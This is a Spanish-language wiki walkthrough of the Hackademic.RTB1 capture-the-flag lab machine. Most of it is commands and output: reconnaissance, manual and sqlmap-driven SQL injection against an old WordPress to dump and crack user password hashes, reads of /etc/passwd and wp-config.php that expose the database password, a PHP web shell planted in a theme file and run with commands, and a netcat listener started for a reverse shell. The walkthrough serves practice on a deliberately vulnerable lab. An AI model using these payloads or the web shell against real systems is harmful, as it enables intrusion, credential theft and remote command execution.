Solucionario Hackademic.RTB1 (Spoiler - NO LEER sin intentarlo antes!!!)
From Sec-Track Wiki
Network Mapping Nmap - ping sweep
root@bt:~# nmap -sP 192.168.64.* Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-11-03 21:40 EDT Nmap scan report for 192.168.64.1 Host is up (0.00027s latency). MAC Address: 00:50:56:C0:00:08 (VMware) Nmap scan report for 192.168.64.2 Host is up (0.00021s latency). MAC Address: 00:50:56:EB:02:8E (VMware) Nmap scan report for 192.168.64.131 Host is up. Nmap scan report for 192.168.64.134 Host is up (0.00050s latency). MAC Address: 00:0C:29:01:8A:4D (VMware) Nmap scan report for 192.168.64.254 Host is up (0.0011s latency). MAC Address: 00:50:56:ED:26:45 (VMware) Nmap done: 256 IP addresses (5 hosts up) scanned in 3.70 seconds
==
Host Identification & Port Scanning
root@bt:~# nmap -sV 192.168.64.134 Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-11-03 21:42 EDT Nmap scan report for 192.168.64.133 Host is up (0.00053s latency). Not shown: 998 filtered ports PORT STATE SERVICE VERSION 22/tcp closed ssh 80/tcp open http Apache httpd 2.2.15 ((Fedora)) MAC Address: 00:0C:29:01:8A:4D (VMware)
root@bt:~# nmap -O 192.168.64.134
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-11-03 21:54 EDT Nmap scan report for 192.168.64.134 Host is up (0.00041s latency). Not shown: 998 filtered ports PORT STATE SERVICE 22/tcp closed ssh 80/tcp open http MAC Address: 00:0C:29:01:8A:4D (VMware) Device type: general purpose Running: Linux 2.6.X OS details: Linux 2.6.22 (Fedora Core 6) Network Distance: 1 hop
==
Options Apache
root@bt:~# nc 192.168.64.134 80 OPTIONS / HTTP/1.0 HTTP/1.1 200 OK Date: Thu, 03 Nov 2011 20:32:21 GMT Server: Apache/2.2.15 (Fedora) Allow: GET,HEAD,POST,OPTIONS,TRACE Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
==
Source Code
<head profile="http://gmpg.org/xfn/11"> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta name="generator" content="WordPress 1.5.1.1" />
==
Wordpress multiple vulnerabilities
http://www.securityfocus.com/archive/1/401597/30/0/threaded - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200506-04 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Wordpress: Multiple vulnerabilities Date: June 06, 2005 Bugs: #88926, #94512 ID: 200506-04 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Wordpress contains SQL injection and XSS vulnerabilities. Description =========== Due to a lack of input validation, WordPress is vulnerable to SQL injection and XSS attacks. Impact ====== An attacker could use the SQL injection vulnerabilites to gain information from the database. Furthermore the cross-site scripting issues give an attacker the ability to inject and execute malicious script code or to steal cookie-based authentication credentials, potentially compromising the victim's browser.
==
Análisis Básico con nikto root@bt:/pentest/web/nikto# perl nikto.pl -h 192.168.64.134
- Nikto v2.1.4 --------------------------------------------------------------------------- + Target IP: 192.168.64.134 + Target Hostname: 192.168.64.134 + Target Port: 80 + Start Time: 2011-11-04 22:16:51 --------------------------------------------------------------------------- + Server: Apache/2.2.15 (Fedora) + Apache/2.2.15 appears to be outdated (current is at least Apache/2.2.17). Apache 1.3.42 (final release) and 2.0.64 are also current. + ETag header found on server, inode: 12748, size: 1475, mtime: 0x4996d177f5c3b + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST + OSVDB-3268: /icons/: Directory indexing found. + OSVDB-3233: /icons/README: Apache default file found. + 6448 items checked: 1 error(s) and 6 item(s) reported on remote host + End Time: 2011-11-04 22:18:40 (109 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
root@bt:/pentest/web/nikto# perl nikto.pl -h http://192.168.64.134/Hackademic_RTB1/
- Nikto v2.1.4 --------------------------------------------------------------------------- + Target IP: 192.168.64.134 + Target Hostname: 192.168.64.134 + Target Port: 80 + Start Time: 2011-11-05 13:04:24 --------------------------------------------------------------------------- + Server: Apache/2.2.15 (Fedora) + Retrieved x-powered-by header: PHP/5.3.3 + No CGI Directories found (use '-C all' to force check all possible dirs) + Apache/2.2.15 appears to be outdated (current is at least Apache/2.2.19). Apache 1.3.42 (final release) and 2.0.64 are also current. + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST + /index.php/\"><script><script>alert(document.cookie)</script><: eZ publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-3092: /xmlrpc.php: xmlrpc.php was found. + /readme.html: This WordPress file reveals the installed version. + OSVDB-3092: /license.txt: License file found may identify site software. + 6456 items checked: 1 error(s) and 9 item(s) reported on remote host + End Time: 2011-11-05 13:05:37 (73 seconds) ---------------------------------------------------------------------------
http://192.168.64.134/Hackademic_RTB1//index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 http://192.168.64.134/Hackademic_RTB1/xmlrpc.php XML-RPC server accepts POST requests only. http://192.168.64.134/Hackademic_RTB1/readme.html http://192.168.64.134/Hackademic_RTB1/license.txt
==
http://192.168.64.134/Hackademic_RTB1/?p='9 --> No vulnerable http://192.168.64.134/Hackademic_RTB1/?cat='1 --> Vulnerable WordPress database error: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\'1 LIMIT 1' at line 1] SELECT * FROM wp_categories WHERE cat_ID = \\\'1 LIMIT 1
http://192.168.64.134/Hackademic_RTB1/?cat=1 order by 1 http://192.168.64.134/Hackademic_RTB1/?cat=1 order by 2 http://192.168.64.134/Hackademic_RTB1/?cat=1 order by 3 http://192.168.64.134/Hackademic_RTB1/?cat=1 order by 4 http://192.168.64.134/Hackademic_RTB1/?cat=1 order by 5 http://192.168.64.134/Hackademic_RTB1/?cat=1 order by 6 Archive for the “WordPress database error: [Unknown column '6' in 'order clause'] SELECT * FROM wp_categories WHERE cat_ID = 1 order by 6 LIMIT 1” Category
http://192.168.64.134/Hackademic_RTB1/?cat=1 union select 1,2,3,4,5
http://192.168.64.134/Hackademic_RTB1/?cat=0 union select 1,2,3,4,5 Archive for the “2” Category DataBase version http://192.168.64.134/Hackademic_RTB1/?cat=0 union select 1,version(),3,4,5 Archive for the “5.1.47” Category Usuario de la DataBase http://192.168.64.134/Hackademic_RTB1/?cat=0 union select 1,user(),3,4,5 Archive for the “root@localhost” Category
Nombre de la DataBase http://192.168.64.134/Hackademic_RTB1/?cat=0 union select 1,database(),3,4,5 Archive for the “wordpress” Category
Wordpress DataBase Description http://codex.wordpress.org/Database_Description wp_commentmeta wp_comments wp_links wp_options wp_postmeta wp_posts wp_terms wp_term_relationships wp_term_taxonomy wp_usermeta wp_users
Table: wp_users Field Type Null Key Default Extra ID bigint(20)unsigned PRI NULL auto_increment user_login varchar(60) IND user_pass varchar(64) user_nicename varchar(50) IND user_email varchar(100) user_url varchar(100) user_registered datetime 0000-00-00 00:00:00 user_activation_key varchar(60) user_status int(11) 0 display_name varchar(250)
Extrayendo users+pass http://192.168.64.137/Hackademic_RTB1/?cat=0 union select 1,concat(user_login,0x3a,user_pass),3,4,5 from wp_users Archive for the “NickJames:21232f297a57a5a743894a0e4a801fc3” Category http://192.168.64.137/Hackademic_RTB1/?cat=0 union select 1,concat(user_login,0x3a,user_pass),3,4,5 from wp_users where ID=2 Archive for the “JohnSmith:b986448f0bb9e5e124ca91d3d650f52c” Category http://192.168.64.137/Hackademic_RTB1/?cat=0 union select 1,concat(user_login,0x3a,user_pass),3,4,5 from wp_users where ID=3 Archive for the “GeorgeMiller:7cbb3252ba6b7e9c422fac5334d22054” Category http://192.168.64.137/Hackademic_RTB1/?cat=0 union select 1,concat(user_login,0x3a,user_pass),3,4,5 from wp_users where ID=4 Archive for the “TonyBlack:a6e514f9486b83cb53d8d932f9a04292” Category http://192.168.64.137/Hackademic_RTB1/?cat=0 union select 1,concat(user_login,0x3a,user_pass),3,4,5 from wp_users where ID=5 Archive for the “JasonKonnors:8601f6e1028a8e8a966f6c33fcd9aec4” Category http://192.168.64.137/Hackademic_RTB1/?cat=0 union select 1,concat(user_login,0x3a,user_pass),3,4,5 from wp_users where ID=6 Archive for the “MaxBucky:50484c19f1afdaf3841a0d821ed393d2” Category
Cracking de pass http://www.hashchecker.de/hash.cgi?action=check&wert=1&hash=21232f297a57a5a743894a0e4a801fc3 etc...
NickJames:21232f297a57a5a743894a0e4a801fc3 > admin JohnSmith:b986448f0bb9e5e124ca91d3d650f52c > PUPPIES GeorgeMiller:7cbb3252ba6b7e9c422fac5334d22054 > q1w2e3 TonyBlack:a6e514f9486b83cb53d8d932f9a04292 > napoleon JasonKonnors:8601f6e1028a8e8a966f6c33fcd9aec4 > maxwell MaxBucky:50484c19f1afdaf3841a0d821ed393d2 > kernel
Otros datos de interés y técnicas de SQLi Leer archivos - passwd http://192.168.64.137/Hackademic_RTB1/?cat=0 union select 1,load_file('/etc/passwd'),3,4,5 Archive for the “WordPress database error: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\'/etc/passwd\\\') ,3,4,5 LIMIT 1' at line 1]SELECT * FROM wp_categories WHERE cat_ID = 0 union select 1,load_file (\\\'/etc/passwd\\\'),3,4,5 LIMIT 1” Category
Por lo tanto debemos encodear nuestra consulta - hex encoded - /etc/passwd http://192.168.64.137/Hackademic_RTB1/?cat=0 union select 1,load_file(0x2f6574632f706173737764),3,4,5 Archive for the “root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin vcsa:x:69:499:virtual console memory owner:/dev:/sbin/nologin avahi-autoipd:x:499:498:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin rtkit:x:498:494:RealtimeKit:/proc:/sbin/nologin nscd:x:28:493:NSCD Daemon:/:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin avahi:x:497:492:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin haldaemon:x:68:491:HAL daemon:/:/sbin/nologin openvpn:x:496:490:OpenVPN:/etc/openvpn:/sbin/nologin apache:x:48:489:Apache:/var/www:/sbin/nologin saslauth:x:495:488:"Saslauthd user":/var/empty/saslauth:/sbin/nologin mailnull:x:47:487::/var/spool/mqueue:/sbin/nologin smmsp:x:51:486::/var/spool/mqueue:/sbin/nologin smolt:x:494:485:Smolt:/usr/share/smolt:/sbin/nologin sshd:x:74:484:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin pulse:x:493:483:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin gdm:x:42:481::/var/lib/gdm:/sbin/nologin p0wnbox.Team:x:500:500:p0wnbox.Team:/home/p0wnbox.Team:/bin/bash mysql:x:27:480:MySQL Server:/var/lib/mysql:/bin/bash ”
Igual con char http://192.168.64.137/Hackademic_RTB1/?cat=0 union select 1,load_file(char(47,101,116,99,47,112,97,115,115,119,100)),3,4,5 Archive for the “root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/ etc.........
/etc/group http://192.168.64.137/Hackademic_RTB1/?cat=0 union select 1,load_file(0x2f6574632f67726f7570),3,4,5 Archive for the “root:x:0:root bin:x:1:root,bin,daemon daemon:x:2:root,bin,daemon sys:x:3:root,bin,adm adm:x:4:root,adm,daemon tty:x:5: disk:x:6:root lp:x:7:daemon,lp mem:x:8: kmem:x:9: wheel:x:10:root mail:x:12:mail uucp:x:14:uucp man:x:15: games:x:20: gopher:x:30: video:x:39: dip:x:40: ftp:x:50: lock:x:54: audio:x:63: nobody:x:99: users:x:100: floppy:x:19: vcsa:x:499: avahi-autoipd:x:498: ntp:x:38: utmp:x:22: utempter:x:35: slocate:x:21: desktop_admin_r:x:497: desktop_user_r:x:496: dbus:x:81: jackuser:x:495: rtkit:x:494: nscd:x:493: tcpdump:x:72: cdrom:x:11: tape:x:33: dialout:x:18: avahi:x:492: haldaemon:x:491: openvpn:x:490: apache:x:489: saslauth:x:488: mailnull:x:487: smmsp:x:486: smolt:x:485: sshd:x:484: pulse:x:483: pulse-access:x:482: gdm:x:481: p0wnbox.Team:x:500: mysql:x:480: ” Category
/etc/hosts http://192.168.64.137/Hackademic_RTB1/?cat=0 union select 1,load_file(0x2f6574632f686f737473),3,4,5 Archive for the “# hostname HackademicRTB1 added to /etc/hosts by anaconda 127.0.0.1 localhost.localdomain localhost HackademicRTB1 ::1 localhost6.localdomain6 localhost6 HackademicRTB1 ” Category
/etc/fstab http://192.168.64.137/Hackademic_RTB1/?cat=0 union select 1,load_file(0x2f6574632f6673746162),3,4,5 Archive for the “ # # /etc/fstab # Created by anaconda on Fri Jan 7 18:39:43 2011 # # Accessible filesystems, by reference, are maintained under '/dev/disk' # See man pages fstab(5), findfs(8), mount(8) and/or blkid(8) for more info # /dev/mapper/vg_hackademicrtb1-lv_root / ext4 defaults 1 1 UUID=860d7298-5bea-4d12-9370-b995fd2371c0 /boot ext4 defaults 1 2 /dev/mapper/vg_hackademicrtb1-lv_swap swap swap defaults 0 0 tmpfs /dev/shm tmpfs defaults 0 0 devpts /dev/pts devpts gid=5,mode=620 0 0 sysfs /sys sysfs defaults 0 0 proc /proc proc defaults 0 0 ” Category
/etc/my.cnf http://192.168.64.137/Hackademic_RTB1/?cat=0 union select 1,load_file(0x2f6574632f6d792e636e66),3,4,5 Archive for the “[mysqld] datadir=/var/lib/mysql socket=/var/lib/mysql/mysql.sock user=mysql # Default to using old password format for compatibility with mysql 3.x # clients (those using the mysqlclient10 compatibility package). old_passwords=1 # Disabling symbolic-links is recommended to prevent assorted security risks; # to do so, uncomment this line: # symbolic-links=0 # To allow mysqld to connect to a MySQL Cluster management daemon, uncomment # these lines and adjust the connectstring as needed. #ndbcluster #ndb-connectstring="nodeid=4;host=localhost:1186" [mysqld_safe] log-error=/var/log/mysqld.log pid-file=/var/run/mysqld/mysqld.pid [ndbd] # If you are running a MySQL Cluster storage daemon (ndbd) on this machine, # adjust its connection to the management daemon here. # Note: ndbd init script requires this to include nodeid! connect-string="nodeid=2;host=localhost:1186" [ndb_mgm] # connection string for MySQL Cluster management tool connect-string="host=localhost:1186" ” Category
Automatizando el trabajo con SQLMAP
Banner DataBase root@bt:~/hackademic01# python /pentest/database/sqlmap/sqlmap.py -u http://192.168.64.137/Hackademic_RTB1/?cat=1 -b web server operating system: Linux Fedora 13 (Goddard) web application technology: PHP 5.3.3, Apache 2.2.15 back-end DBMS: MySQL 5.0 banner: '5.1.47'
Usuario actual root@bt:~/hackademic01# python /pentest/database/sqlmap/sqlmap.py -u http://192.168.64.137/Hackademic_RTB1/?cat=1 --current-user [23:11:44] [INFO] retrieved: root@localhost current user: 'root@localhost'
Base de datos actual root@bt:~/hackademic01# python /pentest/database/sqlmap/sqlmap.py -u http://192.168.64.137/Hackademic_RTB1/?cat=1 --current-db [23:13:26] [INFO] retrieved: wordpress current database: 'wordpress'
Usuario actual es DBA root@bt:~/hackademic01# python /pentest/database/sqlmap/sqlmap.py -u http://192.168.64.137/Hackademic_RTB1/?cat=1 --is-dba [23:14:11] [INFO] retrieved: 1 current user is DBA: 'True'
Enumerar usuarios root@bt:~/hackademic01# python /pentest/database/sqlmap/sqlmap.py -u http://192.168.64.137/Hackademic_RTB1/?cat=1 --users [23:15:47] [INFO] retrieved: 'root'@'localhost' database management system users [27]: [*] 'root'@'localhost'
Password de usuario de la DB root@bt:~/hackademic01# python /pentest/database/sqlmap/sqlmap.py -u http://192.168.64.137/Hackademic_RTB1/?cat=1 --passwords [23:16:42] [INFO] retrieved: root [23:16:42] [INFO] retrieved: 2eaec110380126d7
Cracking del password-hash root@bt:~/hackademic01# ./poc 2eaec110380126d7 mysql crack POC (c) 2006 Philippe Vigier & www.sqlhack.com password for footprint 2eaec110380126d7 = 'lz5yedns'
Privilegios de usuario root@bt:~/hackademic01# python /pentest/database/sqlmap/sqlmap.py -u http://192.168.64.137/Hackademic_RTB1/?cat=1 --privileges database management system users privileges: [*] 'root'@'localhost' (administrator) [27]: privilege: ALTER privilege: ALTER ROUTINE privilege: CREATE privilege: CREATE ROUTINE privilege: CREATE TEMPORARY TABLES privilege: CREATE USER privilege: CREATE VIEW privilege: DELETE privilege: DROP privilege: EVENT privilege: EXECUTE privilege: FILE privilege: INDEX privilege: INSERT privilege: LOCK TABLES privilege: PROCESS privilege: REFERENCES privilege: RELOAD privilege: REPLICATION CLIENT privilege: REPLICATION SLAVE privilege: SELECT privilege: SHOW DATABASES privilege: SHOW VIEW privilege: SHUTDOWN privilege: SUPER privilege: TRIGGER privilege: UPDATE
Bases de datos root@bt:~/hackademic01# python /pentest/database/sqlmap/sqlmap.py -u http://192.168.64.137/Hackademic_RTB1/?cat=1 --dbs back-end DBMS: MySQL 5.0 [23:39:26] [INFO] fetching database names [23:39:26] [INFO] the SQL query used returns 3 entries [23:39:26] [INFO] retrieved: wordpress [23:39:26] [INFO] retrieved: mysql [23:39:26] [INFO] retrieved: information_schema
Tablas root@bt:~/hackademic01# python /pentest/database/sqlmap/sqlmap.py -u http://192.168.64.137/Hackademic_RTB1/?cat=1 -D wordpress --tables Database: wordpress [9 tables] +-------------------+ | wp_categories | | wp_comments | | wp_linkcategories | | wp_links | | wp_options | | wp_post2cat | | wp_postmeta | | wp_posts | | wp_users | +-------------------+
Columnas de wp_users - wordpress root@bt:~/hackademic01# python /pentest/database/sqlmap/sqlmap.py -u http://192.168.64.137/Hackademic_RTB1/?cat=1 -D wordpress -T wp_users --columns Database: wordpress Table: wp_users [22 columns] +---------------------+---------------------+ | Column | Type | +---------------------+---------------------+ | ID | bigint(20) unsigned | | user_activation_key | varchar(60) | | user_aim | varchar(50) | | user_browser | varchar(200) | | user_description | longtext | | user_domain | varchar(200) | | user_email | varchar(100) | | user_firstname | varchar(50) | | user_icq | int(10) unsigned | | user_idmode | varchar(20) | | user_ip | varchar(15) | | user_lastname | varchar(50) | | user_level | int(2) unsigned | | user_login | varchar(60) | | user_msn | varchar(100) | | user_nicename | varchar(50) | | user_nickname | varchar(50) | | user_pass | varchar(64) | | user_registered | datetime | | user_status | int(11) | | user_url | varchar(100) | | user_yim | varchar(50) | +---------------------+---------------------+
Volcado de datos wp_users root@bt:~/hackademic01# python /pentest/database/sqlmap/sqlmap.py -u http://192.168.64.137/Hackademic_RTB1/?cat=1 -D wordpress -T wp_users --dump Database: wordpress Table: wp_users [6 entries] +----+---------------------+----------+--------------+------------------+-------------+-------------------------+---------------- user_email | user_firstname | user_lastname | user_level | user_login | user_pass | +----+---------------------+----------+--------------+------------------+-------------+-------------------------+---------------- | MaxBucky@hacked.com | Max | Bucky | 0 | MaxBucky | b986448f0bb9e5e124ca91d3d650f52c | | JasonKonnors@hacked.com | Jason | Konnors | 0 | JasonKonnors | a6e514f9486b83cb53d8d932f9a04292 | | TonyBlack@hacked.com | Tony | Black | 0 | TonyBlack | 8601f6e1028a8e8a966f6c33fcd9aec4 | | GeorgeMiller@hacked.com | George | Miller | 10 | GeorgeMiller | 7cbb3252ba6b7e9c422fac5334d22054 | | JohnSmith@hacked | John | Smith | 0 | JohnSmith | 50484c19f1afdaf3841a0d821ed393d2 | | NickJames@hacked.com | Nick | James | 1 | NickJames | 21232f297a57a5a743894a0e4a801fc3 | +----+---------------------+----------+--------------+------------------+-------------+-------------------------+----------------
Leer archivos con SQLMap root@bt:~/hackademic01# python /pentest/database/sqlmap/sqlmap.py -u http://192.168.64.137/Hackademic_RTB1/?cat=1 --file-read=/etc/passwd root@bt:~/hackademic01# more /pentest/database/sqlmap/output/192.168.64.137/files/_etc_passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin vcsa:x:69:499:virtual console memory owner:/dev:/sbin/nologin avahi-autoipd:x:499:498:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin rtkit:x:498:494:RealtimeKit:/proc:/sbin/nologin nscd:x:28:493:NSCD Daemon:/:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin avahi:x:497:492:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin haldaemon:x:68:491:HAL daemon:/:/sbin/nologin openvpn:x:496:490:OpenVPN:/etc/openvpn:/sbin/nologin apache:x:48:489:Apache:/var/www:/sbin/nologin saslauth:x:495:488:"Saslauthd user":/var/empty/saslauth:/sbin/nologin mailnull:x:47:487::/var/spool/mqueue:/sbin/nologin smmsp:x:51:486::/var/spool/mqueue:/sbin/nologin smolt:x:494:485:Smolt:/usr/share/smolt:/sbin/nologin sshd:x:74:484:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin pulse:x:493:483:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin gdm:x:42:481::/var/lib/gdm:/sbin/nologin p0wnbox.Team:x:500:500:p0wnbox.Team:/home/p0wnbox.Team:/bin/bash mysql:x:27:480:MySQL Server:/var/lib/mysql:/bin/bash
Sistema Operativo - Tipo de Distro - Versión root@bt:~/hackademic01# python /pentest/database/sqlmap/sqlmap.py -u http://192.168.64.137/Hackademic_RTB1/?cat=1 --file- read=/etc/issue root@bt:~/hackademic01# more /pentest/database/sqlmap/output/192.168.64.137/files/_etc_issue Fedora release 12 (Constantine) Kernel \r on an \m (\l)
Variables de entorno root@bt:~/hackademic01# python /pentest/database/sqlmap/sqlmap.py -u http://192.168.64.137/Hackademic_RTB1/?cat=1 --file-read=/etc/profile root@bt:~/hackademic01# more /pentest/database/sqlmap/output/192.168.64.137/files/_etc_profile # /etc/profile # System wide environment and startup programs, for login setup # Functions and aliases go in /etc/bashrc # It's NOT good idea to change this file unless you know what you # are doing. Much better way is to create custom.sh shell script in # /etc/profile.d/ to make custom changes to environment. This will # prevent need for merging in future updates. pathmunge () { if ! echo $PATH | /bin/egrep -q "(^|:)$1($|:)" ; then if [ "$2" = "after" ] ; then PATH=$PATH:$1 else PATH=$1:$PATH fi fi } # ksh workaround if [ -z "$EUID" -a -x /usr/bin/id ]; then EUID=`id -u` UID=`id -ru` fi # Path manipulation if [ "$EUID" = "0" ]; then pathmunge /sbin pathmunge /usr/sbin pathmunge /usr/local/sbin else pathmunge /usr/local/sbin after pathmunge /usr/sbin after pathmunge /sbin after fi if [ -x /usr/bin/id ]; then USER="`id -un`" LOGNAME=$USER MAIL="/var/spool/mail/$USER" fi HOSTNAME=`/bin/hostname 2>/dev/null` HISTSIZE=1000 HISTCONTROL="ignoreboth" export PATH USER LOGNAME MAIL HOSTNAME HISTSIZE HISTCONTROL for i in /etc/profile.d/*.sh ; do if [ -r "$i" ]; then if [ "$PS1" ]; then . $i else . $i >/dev/null 2>&1 fi fi done unset i unset pathmunge
Leyendo files de la aplicación web root@bt:~/hackademic01# python /pentest/database/sqlmap/sqlmap.py -u http://192.168.64.137/Hackademic_RTB1/?cat=1 --file-read=/var/www/html/Hackademic_RTB1/wp-config.php <?php // ** MySQL settings ** // define('DB_NAME', 'wordpress'); // The name of the database define('DB_USER', 'root'); // Your MySQL username define('DB_PASSWORD', 'lz5yedns'); // ...and password define('DB_HOST', 'localhost'); // 99% chance you won't need to change this value ...etc...
httpd.conf con char http://192.168.64.137/Hackademic_RTB1/?cat=0 union select 1,load_file (char(47,101,116,99,47,104,116,116,112,100,47,99,111,110,102,47,104,116,116,112,100,46,99,111,110,102)),3,4,5
httpd.conf con SQLMap root@bt:~/hackademic01# python /pentest/database/sqlmap/sqlmap.py -u http://192.168.64.137/Hackademic_RTB1/?cat=1 --file-read=/etc/httpd/conf/httpd.conf ServerTokens OS ServerRoot "/etc/httpd" PidFile run/httpd.pid Timeout 120 KeepAlive Off MaxKeepAliveRequests 100 KeepAliveTimeout 15 <IfModule prefork.c> StartServers 8 MinSpareServers 5 MaxSpareServers 20 ServerLimit 256 MaxClients 256 MaxRequestsPerChild 4000 </IfModule> <IfModule worker.c> StartServers 2 MaxClients 150 MinSpareThreads 25 MaxSpareThreads 75 ThreadsPerChild 25 MaxRequestsPerChild 0 </IfModule> Listen 80 Include conf.d/*.conf User apache Group apache ServerAdmin root@localhost UseCanonicalName Off DocumentRoot "/var/www/html" <Directory /> Options FollowSymLinks AllowOverride None </Directory> <Directory "/var/www/html"> Options Indexes FollowSymLinks AllowOverride None Order allow,deny Allow from all </Directory> DirectoryIndex index.html index.html.var AccessFileName .htaccess <Files ~ "^\.ht"> Order allow,deny Deny from all </Files> HostnameLookups Off ErrorLog logs/error_log CustomLog logs/access_log combined ServerSignature On Alias /icons/ "/var/www/icons/" <Directory "/var/www/icons"> Options Indexes MultiViews FollowSymLinks AllowOverride None Order allow,deny Allow from all </Directory> <IfModule mod_dav_fs.c> # Location of the WebDAV lock database. DAVLockDB /var/lib/dav/lockdb </IfModule> ScriptAlias /cgi-bin/ "/var/www/cgi-bin/" <Directory "/var/www/cgi-bin"> AllowOverride None Options None Order allow,deny Allow from all </Directory> Alias /error/ "/var/www/error/" BrowserMatch "Mozilla/2" nokeepalive BrowserMatch "MSIE 4\.0b2;" nokeepalive downgrade-1.0 force-response-1.0 BrowserMatch "RealPlayer 4\.0" force-response-1.0 BrowserMatch "Java/1\.0" force-response-1.0 BrowserMatch "JDK/1\.0" force-response-1.0
Ahora me logueo con el usuario admin de wordpress GeorgeMiller | q1w2e3
El objetivo será recolectar más información y tratar de modificar-crear archivos que permitan ejecutar instrucciones-comandos Editing wp-content/themes/starburst/footer.php <?php phpinfo(); ?>
Ahora visualizo el file footer.php
http://192.168.64.137/Hackademic_RTB1/wp-content/themes/starburst/footer.php PHP Version 5.3.3 System Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686 Build Date Jul 22 2010 16:21:15 Loaded Configuration File /etc/php.ini Scan this dir for additional .ini files /etc/php.d Apache Version Apache/2.2.15 (Fedora) Server Administrator root@localhost Hostname:Port localhost6.localdomain6:0 User/Group apache(48)/489 HTTP_COOKIE wordpressuser_1ba84d35a71d56fdf8eb2350c046e945=GeorgeMiller; wordpresspass_1ba84d35a71d56fdf8eb2350c046e945=604dfd4354c6e7727f873375f3c41e15 DOCUMENT_ROOT /var/www/html etc..............
phpshell simple <?php system($_REQUEST['cmd']); ?> http://192.168.64.137/Hackademic_RTB1/wp-content/themes/starburst/footer.php?cmd=ifconfig eth0 Link encap:Ethernet HWaddr 00:0C:29:01:8A:4D inet addr:192.168.64.133 Bcast:192.168.64.255 etc......
http://192.168.64.137/Hackademic_RTB1/wp-content/themes/starburst/footer.php?cmd=uname -r 2.6.31.5-127.fc12.i686
phpshell avanzada Shell 1.31h 13-11-2011 03:34:03 [ phpinfo ] [ php.ini ] [ cpu ] [ mem ] [ usuarios ] [ tmp ] [ borrar ] safe_mode: OFF PHP version: 5.3.3 cURL: ON MySQL: ON MSSQL: OFF PostgreSQL: OFF Oracle: OFF Funciones deshabilitadas: NONE Espacio libre: 15.03 GB Espacio Total: 17.55 GB uname -a : Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux sysctl : Linux 2.6.31.5-127.fc12.i686 $OSTYPE: linux-gnu servidor: Apache/2.2.15 (Fedora) id: uid=48(apache) gid=489(apache) groups=489(apache) pwd: /var/www/html/Hackademic_RTB1/wp-content/themes/starburst ( drwxrwxrwx )
Reverse shell con netcat Desde la máquina atacante nc -l -n -v -p 80 listening on [any] 80 ...
